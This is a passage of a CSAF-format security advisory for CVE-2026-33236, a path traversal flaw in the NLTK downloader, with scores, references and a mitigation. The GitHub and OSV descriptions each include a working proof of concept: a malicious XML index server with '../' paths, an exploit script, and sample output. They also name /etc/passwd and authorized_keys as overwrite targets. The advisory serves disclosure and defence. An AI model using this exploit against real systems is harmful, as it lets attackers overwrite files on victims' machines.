                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.6.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.6.3",
                                "product": {
                                    "name": "vers:unknown/3.6.3",
                                    "product_id": "CSAFPID-710859",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.6.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.6.4",
                                "product": {
                                    "name": "vers:unknown/3.6.4",
                                    "product_id": "CSAFPID-712017",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.6.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.6.5",
                                "product": {
                                    "name": "vers:unknown/3.6.5",
                                    "product_id": "CSAFPID-712018",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.6.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.6.6",
                                "product": {
                                    "name": "vers:unknown/3.6.6",
                                    "product_id": "CSAFPID-3249769",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.6.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.6.7",
                                "product": {
                                    "name": "vers:unknown/3.6.7",
                                    "product_id": "CSAFPID-3249770",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.6.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.7",
                                "product": {
                                    "name": "vers:unknown/3.7",
                                    "product_id": "CSAFPID-3249771",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.8",
                                "product": {
                                    "name": "vers:unknown/3.8",
                                    "product_id": "CSAFPID-3249772",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.8.1",
                                "product": {
                                    "name": "vers:unknown/3.8.1",
                                    "product_id": "CSAFPID-337467",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.8.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.9",
                                "product": {
                                    "name": "vers:unknown/3.9",
                                    "product_id": "CSAFPID-5667818",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.9.1",
                                "product": {
                                    "name": "vers:unknown/3.9.1",
                                    "product_id": "CSAFPID-5667819",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.9.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.9.2",
                                "product": {
                                    "name": "vers:unknown/3.9.2",
                                    "product_id": "CSAFPID-5667820",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.9.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.9b1",
                                "product": {
                                    "name": "vers:unknown/3.9b1",
                                    "product_id": "CSAFPID-3249773",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/nltk@3.9b1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<=3.9.3",
                                "product": {
                                    "name": "vers:unknown/<=3.9.3",
                                    "product_id": "CSAFPID-5878160",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:*"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<=3.9.2",
                                "product": {
                                    "name": "vers:unknown/>=0|<=3.9.2",
                                    "product_id": "CSAFPID-5667821"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "nltk"
                    }
                ],
                "category": "vendor",
                "name": "nltk"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33236",
            "cwe": {
                "id": "CWE-22",
                "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n   ↓\n2. Provides malicious XML: <package id=\"passwd\" subdir=\"../../etc\" .../>\n   ↓\n3. Victim executes: downloader.download('passwd')\n   ↓\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n   ↓\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n   ↓\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n   ↓\n7. open(filepath, \"wb\") writes file to /etc/passwd.zip\n   ↓\n8. 
System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"<?xml version=\"1.0\"?>\n<nltk_data>\n  <packages>\n    <package id=\"test_file\" subdir=\"../../../../../../../../../tmp\" \n             url=\"http://127.0.0.1:8888/test.zip\" \n             size=\"100\" unzipped_size=\"100\" unzip=\"0\"/>\n  </packages>\n</nltk_data>\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n    f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n    zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n    def do_GET(self):\n        if self.path == '/malicious_index.xml':\n            self.send_response(200)\n            self.send_header('Content-type', 'application/xml')\n            self.end_headers()\n            with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:\n                self.wfile.write(f.read())\n        elif self.path == '/test.zip':\n            self.send_response(200)\n            
self.send_header('Content-type', 'application/zip')\n            self.end_headers()\n            with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:\n                self.wfile.write(f.read())\n        else:\n            self.send_response(404)\n            self.end_headers()\n    \n    def log_message(self, format, *args):\n        pass\n\n# Start server\nif __name__ == \"__main__\":\n    port = 8888\n    server = HTTPServer((\"0.0.0.0\", port), Handler)\n    print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n    print(\"Press Ctrl+C to stop\")\n    try:\n        server.serve_forever()\n    except KeyboardInterrupt:\n        print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n    download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n    print(f\"Download directory: {download_dir}\")\n    \n    # Exploit vulnerability\n    from nltk.downloader import Downloader\n    downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n    downloader.download(\"test_file\", quiet=True)\n    \n    # Check results\n    expected_path = \"/tmp/test_file.zip\"\n    if os.path.exists(expected_path):\n        print(f\"\\n✗ Exploit successful! File written to: {expected_path}\")\n        print(f\"✗ Path traversal attack successful!\")\n    else:\n        print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n    exploit()\n```\n\n### Execution Results\n\n```\n✗ Exploit successful! File written to: /tmp/test_file.zip\n✗ Path traversal attack successful!\n```",
                    "title": "github - https://api.github.com/advisories/GHSA-469j-vmhf-r6v7"
                },
                {
                    "category": "description",
                    "text": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33236"
                },
                {
                    "category": "description",
                    "text": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33236.json"
                },
                {
                    "category": "description",
                    "text": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue.",
                    "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-33236"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in NLTK (Natural Language Toolkit), a suite of open-source Python modules for Natural Language Processing. The NLTK downloader does not validate `subdir` and `id` attributes when processing remote XML index files. A remote attacker can exploit this path traversal vulnerability by controlling a malicious XML index server, providing specially crafted values. This can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite on the system where NLTK is used.\nIMPORTANT: This flaw in NLTK allows for arbitrary file and directory creation or overwrite due to a path traversal vulnerability in its downloader. An attacker controlling a malicious XML index server could exploit this by providing specially crafted `subdir` and `id` attributes. Red Hat products utilizing NLTK, such as components within Red Hat Ansible Automation Platform, Lightspeed Core, OpenShift Lightspeed, and Red Hat OpenShift AI, are affected if configured to use untrusted remote XML index servers.",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33236.json"
                },
                {
                    "category": "description",
                    "text": "## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n   ↓\n2. Provides malicious XML: <package id=\"passwd\" subdir=\"../../etc\" .../>\n   ↓\n3. Victim executes: downloader.download('passwd')\n   ↓\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n   ↓\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n   ↓\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n   ↓\n7. open(filepath, \"wb\") writes file to /etc/passwd.zip\n   ↓\n8. 
System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"<?xml version=\"1.0\"?>\n<nltk_data>\n  <packages>\n    <package id=\"test_file\" subdir=\"../../../../../../../../../tmp\" \n             url=\"http://127.0.0.1:8888/test.zip\" \n             size=\"100\" unzipped_size=\"100\" unzip=\"0\"/>\n  </packages>\n</nltk_data>\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n    f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n    zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n    def do_GET(self):\n        if self.path == '/malicious_index.xml':\n            self.send_response(200)\n            self.send_header('Content-type', 'application/xml')\n            self.end_headers()\n            with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:\n                self.wfile.write(f.read())\n        elif self.path == '/test.zip':\n            self.send_response(200)\n            
self.send_header('Content-type', 'application/zip')\n            self.end_headers()\n            with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:\n                self.wfile.write(f.read())\n        else:\n            self.send_response(404)\n            self.end_headers()\n    \n    def log_message(self, format, *args):\n        pass\n\n# Start server\nif __name__ == \"__main__\":\n    port = 8888\n    server = HTTPServer((\"0.0.0.0\", port), Handler)\n    print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n    print(\"Press Ctrl+C to stop\")\n    try:\n        server.serve_forever()\n    except KeyboardInterrupt:\n        print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n    download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n    print(f\"Download directory: {download_dir}\")\n    \n    # Exploit vulnerability\n    from nltk.downloader import Downloader\n    downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n    downloader.download(\"test_file\", quiet=True)\n    \n    # Check results\n    expected_path = \"/tmp/test_file.zip\"\n    if os.path.exists(expected_path):\n        print(f\"\\n✗ Exploit successful! File written to: {expected_path}\")\n        print(f\"✗ Path traversal attack successful!\")\n    else:\n        print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n    exploit()\n```\n\n### Execution Results\n\n```\n✗ Exploit successful! File written to: /tmp/test_file.zip\n✗ Path traversal attack successful!\n```",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-469j-vmhf-r6v7.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00043",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "4.5",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "There is product data available from source Certbundde",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "There is exploit data available from source Nvd; is related to (a version of) an uncommon product",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 3\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5878160",
                    "CSAFPID-1409483",
                    "CSAFPID-1409484",
                    "CSAFPID-1439279",
                    "CSAFPID-1508255",
                    "CSAFPID-1508257",
                    "CSAFPID-1508259",
                    "CSAFPID-1508263",
                    "CSAFPID-2518221",
                    "CSAFPID-2524222",
                    "CSAFPID-2698058",
                    "CSAFPID-2698059",
                    "CSAFPID-2783920",
                    "CSAFPID-2831632",
                    "CSAFPID-2831633",
                    "CSAFPID-2831634",
                    "CSAFPID-2920384",
                    "CSAFPID-2960939",
                    "CSAFPID-3054652",
                    "CSAFPID-3095614",
                    "CSAFPID-3112099",
                    "CSAFPID-4675946",
                    "CSAFPID-5008757",
                    "CSAFPID-5035448",
                    "CSAFPID-5222641",
                    "CSAFPID-5222767",
                    "CSAFPID-5222780",
                    "CSAFPID-5276226",
                    "CSAFPID-5474797",
                    "CSAFPID-5474798",
                    "CSAFPID-5826731",
                    "CSAFPID-5834017",
                    "CSAFPID-337467",
                    "CSAFPID-477846",
                    "CSAFPID-477847",
                    "CSAFPID-477848",
                    "CSAFPID-477849",
                    "CSAFPID-477850",
                    "CSAFPID-477851",
                    "CSAFPID-477852",
                    "CSAFPID-477853",
                    "CSAFPID-477854",
                    "CSAFPID-477855",
                    "CSAFPID-477856",
                    "CSAFPID-477857",
                    "CSAFPID-477858",
                    "CSAFPID-477859",
                    "CSAFPID-477860",
                    "CSAFPID-477861",
                    "CSAFPID-477862",
                    "CSAFPID-477863",
                    "CSAFPID-477864",
                    "CSAFPID-477865",
                    "CSAFPID-477866",
                    "CSAFPID-710859",
                    "CSAFPID-710860",
                    "CSAFPID-710861",
                    "CSAFPID-710862",
                    "CSAFPID-710863",
                    "CSAFPID-710864",
                    "CSAFPID-712017",
                    "CSAFPID-712018",
                    "CSAFPID-3249744",
                    "CSAFPID-3249745",
                    "CSAFPID-3249746",
                    "CSAFPID-3249747",
                    "CSAFPID-3249748",
                    "CSAFPID-3249749",
                    "CSAFPID-3249750",
                    "CSAFPID-3249751",
                    "CSAFPID-3249752",
                    "CSAFPID-3249753",
                    "CSAFPID-3249754",
                    "CSAFPID-3249755",
                    "CSAFPID-3249756",
                    "CSAFPID-3249757",
                    "CSAFPID-3249758",
                    "CSAFPID-3249759",
                    "CSAFPID-3249760",
                    "CSAFPID-3249761",
                    "CSAFPID-3249762",
                    "CSAFPID-3249763",
                    "CSAFPID-3249764",
                    "CSAFPID-3249765",
                    "CSAFPID-3249766",
                    "CSAFPID-3249767",
                    "CSAFPID-3249768",
                    "CSAFPID-3249769",
                    "CSAFPID-3249770",
                    "CSAFPID-3249771",
                    "CSAFPID-3249772",
                    "CSAFPID-3249773",
                    "CSAFPID-5667818",
                    "CSAFPID-5667819",
                    "CSAFPID-5667820",
                    "CSAFPID-5667821",
                    "CSAFPID-1189281"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-469j-vmhf-r6v7"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33236"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33236.json"
                },
                {
                    "category": "external",
                    "summary": "Source - debian",
                    "url": "https://security-tracker.debian.org/tracker/CVE-2026-33236"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33236.json"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-469j-vmhf-r6v7.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0895.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-469j-vmhf-r6v7"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-33236"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33236"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0895.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0895"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://www.ibm.com/support/pages/node/7267668"
                },
                {
                    "category": "external",
                    "summary": "Reference - certbundde",
                    "url": "https://www.ibm.com/support/pages/node/7267691"
                }
            ],
            "remediations": [
                {
                    "category": "mitigation",
                    "details": "To mitigate this issue, ensure that any application using the NLTK downloader is configured to interact only with trusted XML index servers. Restrict network access for the application using NLTK so that it cannot connect to untrusted external resources. This operational control reduces the risk that an attacker who controls a malicious server can exploit the path traversal vulnerability. A service restart or reload may be required for network configuration changes to take effect.",
                    "product_ids": [
                        "CSAFPID-1439279",
                        "CSAFPID-1508255",
                        "CSAFPID-1508257",
                        "CSAFPID-1508259",
                        "CSAFPID-1508263",
                        "CSAFPID-2518221",
                        "CSAFPID-2524222",
                        "CSAFPID-2698058",
                        "CSAFPID-2698059",
                        "CSAFPID-2783920",
                        "CSAFPID-2831632",
                        "CSAFPID-2831633",
                        "CSAFPID-2831634",
                        "CSAFPID-2920384",
                        "CSAFPID-2960939",
                        "CSAFPID-3054652",
                        "CSAFPID-3095614",
                        "CSAFPID-3112099",
                        "CSAFPID-4675946",
                        "CSAFPID-5008757",
                        "CSAFPID-5035448",
                        "CSAFPID-5222641",
                        "CSAFPID-5222767",
                        "CSAFPID-5222780",
                        "CSAFPID-5276226",
                        "CSAFPID-5474797",
                        "CSAFPID-5474798",
                        "CSAFPID-5826731",
                        "CSAFPID-5834017"
                    ]
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
                        "baseScore": 8.1,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-1189281",
                        "CSAFPID-1409483",
                        "CSAFPID-1409484",
                        "CSAFPID-1439279",
                        "CSAFPID-1508255",
                        "CSAFPID-1508257",
                        "CSAFPID-1508259",
                        "CSAFPID-1508263",
                        "CSAFPID-2518221",
                        "CSAFPID-2524222",
                        "CSAFPID-2698058",
                        "CSAFPID-2698059",
                        "CSAFPID-2783920",
                        "CSAFPID-2831632",
                        "CSAFPID-2831633",
                        "CSAFPID-2831634",
                        "CSAFPID-2920384",
                        "CSAFPID-2960939",
                        "CSAFPID-3054652",
                        "CSAFPID-3095614",
                        "CSAFPID-3112099",
                        "CSAFPID-3249744",
                        "CSAFPID-3249745",
                        "CSAFPID-3249746",
                        "CSAFPID-3249747",
                        "CSAFPID-3249748",
                        "CSAFPID-3249749",
                        "CSAFPID-3249750",
                        "CSAFPID-3249751",
                        "CSAFPID-3249752",
                        "CSAFPID-3249753",
                        "CSAFPID-3249754",
                        "CSAFPID-3249755",
                        "CSAFPID-3249756",
                        "CSAFPID-3249757",
                        "CSAFPID-3249758",
                        "CSAFPID-3249759",
                        "CSAFPID-3249760",
                        "CSAFPID-3249761",
                        "CSAFPID-3249762",
                        "CSAFPID-3249763",
                        "CSAFPID-3249764",
                        "CSAFPID-3249765",
                        "CSAFPID-3249766",
                        "CSAFPID-3249767",
                        "CSAFPID-3249768",
                        "CSAFPID-3249769",
                        "CSAFPID-3249770",
                        "CSAFPID-3249771",
                        "CSAFPID-3249772",
                        "CSAFPID-3249773",
                        "CSAFPID-337467",
                        "CSAFPID-4675946",
                        "CSAFPID-477846",
                        "CSAFPID-477847",
                        "CSAFPID-477848",
                        "CSAFPID-477849",
                        "CSAFPID-477850",
                        "CSAFPID-477851",
                        "CSAFPID-477852",
                        "CSAFPID-477853",
                        "CSAFPID-477854",
                        "CSAFPID-477855",
                        "CSAFPID-477856",
                        "CSAFPID-477857",
                        "CSAFPID-477858",
                        "CSAFPID-477859",
                        "CSAFPID-477860",
                        "CSAFPID-477861",
                        "CSAFPID-477862",
                        "CSAFPID-477863",
                        "CSAFPID-477864",
                        "CSAFPID-477865",
                        "CSAFPID-477866",
                        "CSAFPID-5008757",
                        "CSAFPID-5035448",
                        "CSAFPID-5222641",
                        "CSAFPID-5222767",
                        "CSAFPID-5222780",
                        "CSAFPID-5276226",
                        "CSAFPID-5474797",
                        "CSAFPID-5474798",
                        "CSAFPID-5667818",
                        "CSAFPID-5667819",
                        "CSAFPID-5667820",
                        "CSAFPID-5667821",
                        "CSAFPID-5826731",
                        "CSAFPID-5834017",
                        "CSAFPID-5878160",
                        "CSAFPID-710859",
                        "CSAFPID-710860",
                        "CSAFPID-710861",
                        "CSAFPID-710862",
                        "CSAFPID-710863",
                        "CSAFPID-710864",
                        "CSAFPID-712017",
                        "CSAFPID-712018"
                    ]
                }
            ],
            "title": "CVE-2026-33236"
        }
    ]
}